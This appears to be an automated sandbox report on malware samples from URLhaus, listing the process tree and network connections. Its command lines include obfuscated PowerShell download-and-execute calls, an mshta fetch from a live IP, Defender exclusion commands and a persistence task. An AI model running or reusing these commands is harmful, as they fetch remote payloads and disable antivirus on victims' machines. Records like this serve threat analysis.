C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4780,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff842e83cb8,0x7ff842e83cc8,0x7ff842e83cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\unik.exe

"C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2720 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4760 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2296 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\System.exe

"C:\Users\Admin\Downloads\UrlHausFiles\System.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_System.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_System.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update

C:\Windows\system32\mshta.exe

mshta http://176.113.115.178/Windows-Update

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Users\Admin\Downloads\UrlHausFiles\bp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Downloads\UrlHausFiles\abc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\abc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe

"C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGDGIJKFIJDA" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe"

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 151.101.194.49:443 urlhaus.abuse.ch tcp
N/A 127.0.0.1:49848 tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 utorrent-backup-server3.top udp
US 8.8.8.8:53 utorrent-backup-server4.top udp
CN 139.196.31.48:14417 tcp
CN 139.196.31.48:2324 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 114.215.27.238:8100 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
CN 61.144.96.138:888 tcp
CH 138.188.36.82:80 138.188.36.82 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CH 138.188.34.220:80 138.188.34.220 tcp
IN 111.118.250.244:80 111.118.250.244 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
TR 178.242.54.178:80 178.242.54.178 tcp
US 75.18.210.21:80 75.18.210.21 tcp
DE 62.216.196.186:80 62.216.196.186 tcp
HK 219.77.72.53:80 219.77.72.53 tcp
BR 179.89.224.192:80 179.89.224.192 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
MO 202.175.60.117:80 202.175.60.117 tcp
FR 80.15.103.89:80 80.15.103.89 tcp
CN 110.40.250.173:2324 tcp
CN 113.85.101.199:81 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
IT 93.47.199.117:80 93.47.199.117 tcp
TW 122.116.26.47:4080 122.116.26.47 tcp
KR 121.142.127.237:8605 121.142.127.237 tcp
CN 121.235.184.125:9000 tcp
TW 122.116.26.47:8443 122.116.26.47 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
TR 178.242.54.178:88 178.242.54.178 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
CN 49.81.40.231:111 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
CN 49.81.203.0:111 tcp
KR 222.104.204.78:8000 222.104.204.78 tcp
BR 189.61.50.98:8080 189.61.50.98 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
KR 59.19.185.137:8602 59.19.185.137 tcp
CN 47.103.126.166:8072 tcp
ES 37.13.48.49:80 37.13.48.49 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
HK 149.88.73.206:80 149.88.73.206 tcp
US 141.155.36.213:41790 141.155.36.213 tcp
CA 184.145.33.5:80 184.145.33.5 tcp
CN 43.241.17.145:8899 tcp
KR 121.154.20.150:80 121.154.20.150 tcp
US 96.250.166.185:88 96.250.166.185 tcp
US 24.252.169.236:80 24.252.169.236 tcp
CA 76.67.131.51:80 76.67.131.51 tcp
MX 187.144.154.105:80 187.144.154.105 tcp
CA 76.68.62.152:80 76.68.62.152 tcp
CA 99.234.132.85:80 99.234.132.85 tcp
MX 187.225.233.208:80 187.225.233.208 tcp
KR 14.37.138.88:8602 14.37.138.88 tcp
CA 142.67.169.45:80 142.67.169.45 tcp
BE 109.137.108.215:8083 109.137.108.215 tcp
US 166.145.98.1:80 166.145.98.1 tcp
FR 109.210.138.197:80 109.210.138.197 tcp
TR 5.26.174.234:80 5.26.174.234 tcp
NL 85.31.47.135:80 85.31.47.135 tcp
BG 87.121.86.16:80 utorrent-backup-server4.top tcp
BG 87.121.86.206:80 87.121.86.206 tcp
BG 87.121.86.206:443 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 158.101.35.62:9000 158.101.35.62 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 172.67.204.246:443 cdn.chuk.cz tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 update-checker-status.cc udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
CN 180.140.124.53:60 tcp
HK 219.73.22.64:8084 219.73.22.64 tcp
DE 38.242.241.140:80 38.242.241.140 tcp
CN 49.234.48.162:80 tcp
CN 36.110.15.211:9000 tcp
CN 202.107.235.202:8088 tcp
MA 102.53.15.54:80 102.53.15.54 tcp
CN 203.2.65.29:8081 tcp
BG 87.121.86.16:80 update-checker-status.cc tcp
US 8.8.8.8:53 89.103.15.80.in-addr.arpa udp
US 8.8.8.8:53 186.196.216.62.in-addr.arpa udp
US 8.8.8.8:53 135.47.31.85.in-addr.arpa udp
US 8.8.8.8:53 16.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 206.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 197.138.210.109.in-addr.arpa udp
US 8.8.8.8:53 117.199.47.93.in-addr.arpa udp
US 8.8.8.8:53 215.108.137.109.in-addr.arpa udp
US 8.8.8.8:53 82.36.188.138.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 220.34.188.138.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 246.204.67.172.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 185.166.250.96.in-addr.arpa udp
US 8.8.8.8:53 49.48.13.37.in-addr.arpa udp
US 8.8.8.8:53 213.36.155.141.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
US 8.8.8.8:53 236.169.252.24.in-addr.arpa udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 8.8.8.8:53 5.33.145.184.in-addr.arpa udp
US 8.8.8.8:53 51.131.67.76.in-addr.arpa udp
US 8.8.8.8:53 152.62.68.76.in-addr.arpa udp
US 8.8.8.8:53 45.169.67.142.in-addr.arpa udp
US 8.8.8.8:53 178.54.242.178.in-addr.arpa udp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 1.153.59.68.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 85.132.234.99.in-addr.arpa udp
US 8.8.8.8:53 151.122.250.159.in-addr.arpa udp
US 8.8.8.8:53 244.250.118.111.in-addr.arpa udp
US 8.8.8.8:53 234.174.26.5.in-addr.arpa udp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 62.35.101.158.in-addr.arpa udp
US 8.8.8.8:53 1.98.145.166.in-addr.arpa udp
US 8.8.8.8:53 105.154.144.187.in-addr.arpa udp
US 8.8.8.8:53 208.233.225.187.in-addr.arpa udp
US 8.8.8.8:53 192.224.89.179.in-addr.arpa udp
US 8.8.8.8:53 98.50.61.189.in-addr.arpa udp
US 8.8.8.8:53 53.72.77.219.in-addr.arpa udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 90.252.1.121.in-addr.arpa udp
US 8.8.8.8:53 117.60.175.202.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 137.185.19.59.in-addr.arpa udp
US 8.8.8.8:53 140.241.242.38.in-addr.arpa udp
US 8.8.8.8:53 47.26.116.122.in-addr.arpa udp
US 8.8.8.8:53 150.20.154.121.in-addr.arpa udp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
CN 117.72.70.169:80 tcp
MX 148.231.192.3:80 desquer.ens.uabc.mx tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
DE 172.105.66.118:80 172-105-66-118.ip.linodeusercontent.com tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
US 172.66.0.235:443 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev tcp
US 204.138.94.134:443 microsecurityupdate.com tcp
CN 59.110.104.183:8888 hnjgdl.geps.glodon.com tcp
CN 39.106.158.243:80 soft.110route.com tcp
RU 185.215.113.66:80 deauduafzgezzfgm.top tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
CN 113.106.6.106:14319 tcp
US 172.67.219.35:80 adf6.adf6.com tcp
US 50.31.188.149:443 cvinetwork.org tcp
KR 112.217.207.130:80 112.217.207.130 tcp
SG 158.140.133.56:8090 158.140.133.56 tcp
RU 185.215.113.66:80 deauduafzgezzfgm.top tcp
NL 149.154.167.99:443 t.me tcp
DE 116.203.8.137:443 pivko.sbs tcp
LV 198.181.163.35:4410 frojbdawmiojfg.sytes.net tcp
DE 172.105.66.118:8080 172-105-66-118.ip.linodeusercontent.com tcp
TH 154.197.69.165:80 154.197.69.165 tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
CN 117.72.70.169:80 tcp
CN 121.40.100.23:12616 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
CN 39.108.237.194:80 tcp
KR 203.232.37.151:80 203.232.37.151 tcp
DE 185.254.96.92:80 185.254.96.92 tcp
HK 103.73.160.35:80 103.73.160.35 tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 74.64.155.4:9090 74.64.155.4 tcp
CN 117.50.95.62:9880 paytest.infinitegalaxy.cn tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 192.74.234.120:80 ad.adf6.com tcp
US 204.138.94.134:80 microsecurityupdate.com tcp
US 23.122.210.174:80 23.122.210.174 tcp
IR 217.172.98.87:80 karoonpc.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
GB 142.250.178.14:443 clients2.google.com tcp
US 206.217.142.166:1234 tcp
CN 117.157.17.194:9999 tcp
KR 114.201.95.60:80 www.medises.co.kr tcp
GB 64.210.156.22:443 ht-cdn2.adtng.com tcp
GB 64.210.156.22:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
